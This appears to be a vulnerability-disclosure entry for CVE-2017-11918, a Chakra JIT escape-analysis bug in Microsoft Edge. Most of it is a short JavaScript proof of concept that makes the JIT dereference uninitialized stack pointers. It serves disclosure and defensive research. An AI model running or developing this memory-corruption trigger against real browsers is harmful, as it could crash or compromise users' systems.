Microsoft Edge Chakra JIT - Escape Analysis Bug

Author: Google Security Research
type: dos
platform: windows
port: 
date_added: 2018-01-09 
date_updated: 2018-01-09 
verified: 1 
codes: CVE-2017-11918 
tags: 
aliases:  
screenshot_url:  
application_url: 

/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.

PoC:
*/

function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt());  // deref uninitialized stack pointers!
}

main();